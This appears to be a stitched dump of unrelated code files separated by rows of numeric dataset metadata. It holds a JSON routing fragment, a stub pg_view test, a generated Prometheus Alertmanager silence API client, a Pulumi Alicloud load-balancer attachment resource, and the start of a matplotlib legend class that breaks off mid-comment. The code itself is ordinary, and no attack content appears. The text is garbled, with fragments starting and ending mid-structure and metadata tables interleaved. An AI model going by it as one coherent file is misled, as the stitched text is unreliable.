"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
]
}
}
}
| 45.454615 | 82 | 0.249835 | 3,718 | 59,091 | 3.970414 | 0.029855 | 0.165967 | 0.066319 | 0.076209 | 0.979339 | 0.977307 | 0.973107 | 0.973107 | 0.973107 | 0.962878 | 0 | 0.090121 | 0.621431 | 59,091 | 1,299 | 83 | 45.489607 | 0.569781 | 0 | 0 | 0.550423 | 0 | 0 | 0.28864 | 0.02046 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
81bd2ee20f413f75d6dddc50885598cdcc227b62 | 44 | py | Python | tests/test_dummy.py | pshen/pg_view | 04f7ae112653bf02e7911c5819aa8c2aac4aded0 | [
"Apache-2.0"
] | null | null | null | tests/test_dummy.py | pshen/pg_view | 04f7ae112653bf02e7911c5819aa8c2aac4aded0 | [
"Apache-2.0"
] | null | null | null | tests/test_dummy.py | pshen/pg_view | 04f7ae112653bf02e7911c5819aa8c2aac4aded0 | [
"Apache-2.0"
] | null | null | null | import pg_view
def test_dummy():
pass
| 7.333333 | 17 | 0.681818 | 7 | 44 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 44 | 5 | 18 | 8.8 | 0.848485 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
81ccdffd104b039030b8dacb33f0a4970ea858c3 | 15,774 | py | Python | swagger_client/api/silence_api.py | voronenko-p/e-amtool | c3f201098d8f7b05ed32c391c25603cb0a7565d4 | [
"MIT"
] | 1 | 2020-05-04T08:13:16.000Z | 2020-05-04T08:13:16.000Z | swagger_client/api/silence_api.py | voronenko-p/e-amtool | c3f201098d8f7b05ed32c391c25603cb0a7565d4 | [
"MIT"
] | null | null | null | swagger_client/api/silence_api.py | voronenko-p/e-amtool | c3f201098d8f7b05ed32c391c25603cb0a7565d4 | [
"MIT"
] | 2 | 2019-03-06T23:10:20.000Z | 2020-03-03T09:37:07.000Z | # coding: utf-8
"""
Alertmanager API
API of the Prometheus Alertmanager (https://github.com/prometheus/alertmanager) # noqa: E501
OpenAPI spec version: 0.0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class SilenceApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_silence(self, silence_id, **kwargs): # noqa: E501
"""delete_silence # noqa: E501
Delete a silence by its ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_silence(silence_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str silence_id: ID of the silence to get (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_silence_with_http_info(silence_id, **kwargs) # noqa: E501
else:
(data) = self.delete_silence_with_http_info(silence_id, **kwargs) # noqa: E501
return data
def delete_silence_with_http_info(self, silence_id, **kwargs): # noqa: E501
"""delete_silence # noqa: E501
Delete a silence by its ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_silence_with_http_info(silence_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str silence_id: ID of the silence to get (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['silence_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_silence" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'silence_id' is set
if ('silence_id' not in params or
params['silence_id'] is None):
raise ValueError("Missing the required parameter `silence_id` when calling `delete_silence`") # noqa: E501
collection_formats = {}
path_params = {}
if 'silence_id' in params:
path_params['silenceID'] = params['silence_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/silence/{silenceID}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_silence(self, silence_id, **kwargs): # noqa: E501
"""get_silence # noqa: E501
Get a silence by its ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_silence(silence_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str silence_id: ID of the silence to get (required)
:return: GettableSilence
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_silence_with_http_info(silence_id, **kwargs) # noqa: E501
else:
(data) = self.get_silence_with_http_info(silence_id, **kwargs) # noqa: E501
return data
def get_silence_with_http_info(self, silence_id, **kwargs): # noqa: E501
"""get_silence # noqa: E501
Get a silence by its ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_silence_with_http_info(silence_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str silence_id: ID of the silence to get (required)
:return: GettableSilence
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['silence_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_silence" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'silence_id' is set
if ('silence_id' not in params or
params['silence_id'] is None):
raise ValueError("Missing the required parameter `silence_id` when calling `get_silence`") # noqa: E501
collection_formats = {}
path_params = {}
if 'silence_id' in params:
path_params['silenceID'] = params['silence_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/silence/{silenceID}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GettableSilence', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_silences(self, **kwargs): # noqa: E501
"""get_silences # noqa: E501
Get a list of silences # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_silences(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] filter: A list of matchers to filter silences by
:return: GettableSilences
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_silences_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_silences_with_http_info(**kwargs) # noqa: E501
return data
def get_silences_with_http_info(self, **kwargs): # noqa: E501
"""get_silences # noqa: E501
Get a list of silences # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_silences_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] filter: A list of matchers to filter silences by
:return: GettableSilences
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_silences" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
collection_formats['filter'] = 'csv' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/silences', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GettableSilences', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_silences(self, silence, **kwargs): # noqa: E501
"""post_silences # noqa: E501
Post a new silence or update an existing one # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_silences(silence, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PostableSilence silence: The silence to create (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_silences_with_http_info(silence, **kwargs) # noqa: E501
else:
(data) = self.post_silences_with_http_info(silence, **kwargs) # noqa: E501
return data
def post_silences_with_http_info(self, silence, **kwargs): # noqa: E501
"""post_silences # noqa: E501
Post a new silence or update an existing one # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_silences_with_http_info(silence, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PostableSilence silence: The silence to create (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['silence'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_silences" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'silence' is set
if ('silence' not in params or
params['silence'] is None):
raise ValueError("Missing the required parameter `silence` when calling `post_silences`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'silence' in params:
body_params = params['silence']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/silences', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 36.85514 | 119 | 0.603715 | 1,810 | 15,774 | 5.014917 | 0.088398 | 0.056406 | 0.024678 | 0.031729 | 0.918145 | 0.911314 | 0.896772 | 0.883882 | 0.878815 | 0.864493 | 0 | 0.019187 | 0.306137 | 15,774 | 427 | 120 | 36.941452 | 0.810142 | 0.329466 | 0 | 0.762332 | 1 | 0 | 0.169429 | 0.027174 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040359 | false | 0 | 0.017937 | 0 | 0.116592 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c49562eb2271b7213b0610de059445e954f729e9 | 18,099 | py | Python | sdk/python/pulumi_alicloud/slb/attachment.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/slb/attachment.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/slb/attachment.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['AttachmentArgs', 'Attachment']
@pulumi.input_type
class AttachmentArgs:
def __init__(__self__, *,
instance_ids: pulumi.Input[Sequence[pulumi.Input[str]]],
load_balancer_id: pulumi.Input[str],
backend_servers: Optional[pulumi.Input[str]] = None,
delete_protection_validation: Optional[pulumi.Input[bool]] = None,
server_type: Optional[pulumi.Input[str]] = None,
weight: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a Attachment resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: A list of instance ids to added backend server in the SLB.
:param pulumi.Input[str] load_balancer_id: ID of the load balancer.
:param pulumi.Input[str] backend_servers: The backend servers of the load balancer.
:param pulumi.Input[bool] delete_protection_validation: Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
:param pulumi.Input[str] server_type: Type of the instances. Valid value ecs, eni. Default to ecs.
:param pulumi.Input[int] weight: Weight of the instances. Valid value range: [0-100]. Default to 100.
"""
pulumi.set(__self__, "instance_ids", instance_ids)
pulumi.set(__self__, "load_balancer_id", load_balancer_id)
if backend_servers is not None:
pulumi.set(__self__, "backend_servers", backend_servers)
if delete_protection_validation is not None:
pulumi.set(__self__, "delete_protection_validation", delete_protection_validation)
if server_type is not None:
pulumi.set(__self__, "server_type", server_type)
if weight is not None:
pulumi.set(__self__, "weight", weight)
@property
@pulumi.getter(name="instanceIds")
def instance_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of instance ids to added backend server in the SLB.
"""
return pulumi.get(self, "instance_ids")
@instance_ids.setter
def instance_ids(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "instance_ids", value)
@property
@pulumi.getter(name="loadBalancerId")
def load_balancer_id(self) -> pulumi.Input[str]:
"""
ID of the load balancer.
"""
return pulumi.get(self, "load_balancer_id")
@load_balancer_id.setter
def load_balancer_id(self, value: pulumi.Input[str]):
pulumi.set(self, "load_balancer_id", value)
@property
@pulumi.getter(name="backendServers")
def backend_servers(self) -> Optional[pulumi.Input[str]]:
"""
The backend servers of the load balancer.
"""
return pulumi.get(self, "backend_servers")
@backend_servers.setter
def backend_servers(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backend_servers", value)
@property
@pulumi.getter(name="deleteProtectionValidation")
def delete_protection_validation(self) -> Optional[pulumi.Input[bool]]:
"""
Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
"""
return pulumi.get(self, "delete_protection_validation")
@delete_protection_validation.setter
def delete_protection_validation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "delete_protection_validation", value)
@property
@pulumi.getter(name="serverType")
def server_type(self) -> Optional[pulumi.Input[str]]:
"""
Type of the instances. Valid value ecs, eni. Default to ecs.
"""
return pulumi.get(self, "server_type")
@server_type.setter
def server_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_type", value)
@property
@pulumi.getter
def weight(self) -> Optional[pulumi.Input[int]]:
"""
Weight of the instances. Valid value range: [0-100]. Default to 100.
"""
return pulumi.get(self, "weight")
@weight.setter
def weight(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "weight", value)
@pulumi.input_type
class _AttachmentState:
def __init__(__self__, *,
backend_servers: Optional[pulumi.Input[str]] = None,
delete_protection_validation: Optional[pulumi.Input[bool]] = None,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
load_balancer_id: Optional[pulumi.Input[str]] = None,
server_type: Optional[pulumi.Input[str]] = None,
weight: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering Attachment resources.
:param pulumi.Input[str] backend_servers: The backend servers of the load balancer.
:param pulumi.Input[bool] delete_protection_validation: Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: A list of instance ids to added backend server in the SLB.
:param pulumi.Input[str] load_balancer_id: ID of the load balancer.
:param pulumi.Input[str] server_type: Type of the instances. Valid value ecs, eni. Default to ecs.
:param pulumi.Input[int] weight: Weight of the instances. Valid value range: [0-100]. Default to 100.
"""
if backend_servers is not None:
pulumi.set(__self__, "backend_servers", backend_servers)
if delete_protection_validation is not None:
pulumi.set(__self__, "delete_protection_validation", delete_protection_validation)
if instance_ids is not None:
pulumi.set(__self__, "instance_ids", instance_ids)
if load_balancer_id is not None:
pulumi.set(__self__, "load_balancer_id", load_balancer_id)
if server_type is not None:
pulumi.set(__self__, "server_type", server_type)
if weight is not None:
pulumi.set(__self__, "weight", weight)
@property
@pulumi.getter(name="backendServers")
def backend_servers(self) -> Optional[pulumi.Input[str]]:
"""
The backend servers of the load balancer.
"""
return pulumi.get(self, "backend_servers")
@backend_servers.setter
def backend_servers(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backend_servers", value)
@property
@pulumi.getter(name="deleteProtectionValidation")
def delete_protection_validation(self) -> Optional[pulumi.Input[bool]]:
"""
Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
"""
return pulumi.get(self, "delete_protection_validation")
@delete_protection_validation.setter
def delete_protection_validation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "delete_protection_validation", value)
@property
@pulumi.getter(name="instanceIds")
def instance_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of instance ids to added backend server in the SLB.
"""
return pulumi.get(self, "instance_ids")
@instance_ids.setter
def instance_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "instance_ids", value)
@property
@pulumi.getter(name="loadBalancerId")
def load_balancer_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the load balancer.
"""
return pulumi.get(self, "load_balancer_id")
@load_balancer_id.setter
def load_balancer_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancer_id", value)
@property
@pulumi.getter(name="serverType")
def server_type(self) -> Optional[pulumi.Input[str]]:
"""
Type of the instances. Valid value ecs, eni. Default to ecs.
"""
return pulumi.get(self, "server_type")
@server_type.setter
def server_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_type", value)
@property
@pulumi.getter
def weight(self) -> Optional[pulumi.Input[int]]:
"""
Weight of the instances. Valid value range: [0-100]. Default to 100.
"""
return pulumi.get(self, "weight")
@weight.setter
def weight(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "weight", value)
class Attachment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backend_servers: Optional[pulumi.Input[str]] = None,
delete_protection_validation: Optional[pulumi.Input[bool]] = None,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
load_balancer_id: Optional[pulumi.Input[str]] = None,
server_type: Optional[pulumi.Input[str]] = None,
weight: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
## Import
Load balancer attachment can be imported using the id or load balancer id, e.g.
```sh
$ pulumi import alicloud:slb/attachment:Attachment example lb-abc123456
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] backend_servers: The backend servers of the load balancer.
:param pulumi.Input[bool] delete_protection_validation: Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: A list of instance ids to added backend server in the SLB.
:param pulumi.Input[str] load_balancer_id: ID of the load balancer.
:param pulumi.Input[str] server_type: Type of the instances. Valid value ecs, eni. Default to ecs.
:param pulumi.Input[int] weight: Weight of the instances. Valid value range: [0-100]. Default to 100.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AttachmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Import
Load balancer attachment can be imported using the id or load balancer id, e.g.
```sh
$ pulumi import alicloud:slb/attachment:Attachment example lb-abc123456
```
:param str resource_name: The name of the resource.
:param AttachmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AttachmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backend_servers: Optional[pulumi.Input[str]] = None,
delete_protection_validation: Optional[pulumi.Input[bool]] = None,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
load_balancer_id: Optional[pulumi.Input[str]] = None,
server_type: Optional[pulumi.Input[str]] = None,
weight: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AttachmentArgs.__new__(AttachmentArgs)
__props__.__dict__["backend_servers"] = backend_servers
__props__.__dict__["delete_protection_validation"] = delete_protection_validation
if instance_ids is None and not opts.urn:
raise TypeError("Missing required property 'instance_ids'")
__props__.__dict__["instance_ids"] = instance_ids
if load_balancer_id is None and not opts.urn:
raise TypeError("Missing required property 'load_balancer_id'")
__props__.__dict__["load_balancer_id"] = load_balancer_id
__props__.__dict__["server_type"] = server_type
__props__.__dict__["weight"] = weight
super(Attachment, __self__).__init__(
'alicloud:slb/attachment:Attachment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
backend_servers: Optional[pulumi.Input[str]] = None,
delete_protection_validation: Optional[pulumi.Input[bool]] = None,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
load_balancer_id: Optional[pulumi.Input[str]] = None,
server_type: Optional[pulumi.Input[str]] = None,
weight: Optional[pulumi.Input[int]] = None) -> 'Attachment':
"""
Get an existing Attachment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] backend_servers: The backend servers of the load balancer.
:param pulumi.Input[bool] delete_protection_validation: Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: A list of instance ids to added backend server in the SLB.
:param pulumi.Input[str] load_balancer_id: ID of the load balancer.
:param pulumi.Input[str] server_type: Type of the instances. Valid value ecs, eni. Default to ecs.
:param pulumi.Input[int] weight: Weight of the instances. Valid value range: [0-100]. Default to 100.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _AttachmentState.__new__(_AttachmentState)
__props__.__dict__["backend_servers"] = backend_servers
__props__.__dict__["delete_protection_validation"] = delete_protection_validation
__props__.__dict__["instance_ids"] = instance_ids
__props__.__dict__["load_balancer_id"] = load_balancer_id
__props__.__dict__["server_type"] = server_type
__props__.__dict__["weight"] = weight
return Attachment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="backendServers")
def backend_servers(self) -> pulumi.Output[str]:
"""
The backend servers of the load balancer.
"""
return pulumi.get(self, "backend_servers")
@property
@pulumi.getter(name="deleteProtectionValidation")
def delete_protection_validation(self) -> pulumi.Output[Optional[bool]]:
"""
Checking DeleteProtection of SLB instance before deleting. If true, this resource will not be deleted when its SLB instance enabled DeleteProtection. Default to false.
"""
return pulumi.get(self, "delete_protection_validation")
@property
@pulumi.getter(name="instanceIds")
def instance_ids(self) -> pulumi.Output[Sequence[str]]:
"""
A list of instance ids to added backend server in the SLB.
"""
return pulumi.get(self, "instance_ids")
@property
@pulumi.getter(name="loadBalancerId")
def load_balancer_id(self) -> pulumi.Output[str]:
"""
ID of the load balancer.
"""
return pulumi.get(self, "load_balancer_id")
@property
@pulumi.getter(name="serverType")
def server_type(self) -> pulumi.Output[Optional[str]]:
"""
Type of the instances. Valid value ecs, eni. Default to ecs.
"""
return pulumi.get(self, "server_type")
@property
@pulumi.getter
def weight(self) -> pulumi.Output[Optional[int]]:
"""
Weight of the instances. Valid value range: [0-100]. Default to 100.
"""
return pulumi.get(self, "weight")
| 45.589421 | 231 | 0.661584 | 2,158 | 18,099 | 5.31279 | 0.078777 | 0.091147 | 0.06594 | 0.046053 | 0.85495 | 0.839686 | 0.827998 | 0.815526 | 0.811077 | 0.791452 | 0 | 0.004501 | 0.238963 | 18,099 | 396 | 232 | 45.704545 | 0.827864 | 0.297641 | 0 | 0.733906 | 1 | 0 | 0.111889 | 0.030715 | 0 | 0 | 0 | 0 | 0 | 1 | 0.158798 | false | 0.004292 | 0.021459 | 0 | 0.274678 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c4c2a5455d730a2e4fe67e342c6434f75191c5a9 | 7,013 | py | Python | src/scrawl/moves/legend.py | astromancer/graphical | 2d72407c53967714953485dd52ad72e34e549ef5 | [
"MIT"
] | null | null | null | src/scrawl/moves/legend.py | astromancer/graphical | 2d72407c53967714953485dd52ad72e34e549ef5 | [
"MIT"
] | null | null | null | src/scrawl/moves/legend.py | astromancer/graphical | 2d72407c53967714953485dd52ad72e34e549ef5 | [
"MIT"
] | null | null | null | from matplotlib.lines import Line2D
from matplotlib.container import ErrorbarContainer
from scrawl.connect import ConnectionMixin, mpl_connect
class DynamicLegend(ConnectionMixin):
# TODO: subclass Legend??
'''
Enables toggling marker / bar / cap visibility by selecting on the legend.
'''
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_default_legend = dict(fancybox=True,
framealpha=0.5,
# handler_map={ErrorbarContainer:
# ReorderedErrorbarHandler(numpoints=1)}
)
# label_map = {ErrorbarContainer: 'errorbar{}',
# Line2D: 'line{}'}
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def __init__(self, ax, plots, legendkw={}):
'''enable legend picking'''
# initialize auto-connect
ConnectionMixin.__init__(self, ax.figure)
# Auto-generate labels
# NOTE: This needs to be done to enable legend picking. if the artists
# are unlabeled, no legend will be created and we therefor cannot pick them!
# i = 0
# for plot in plots:
# if not plot.get_label():
# lbl = self.label_map[type(plot)].format(i)
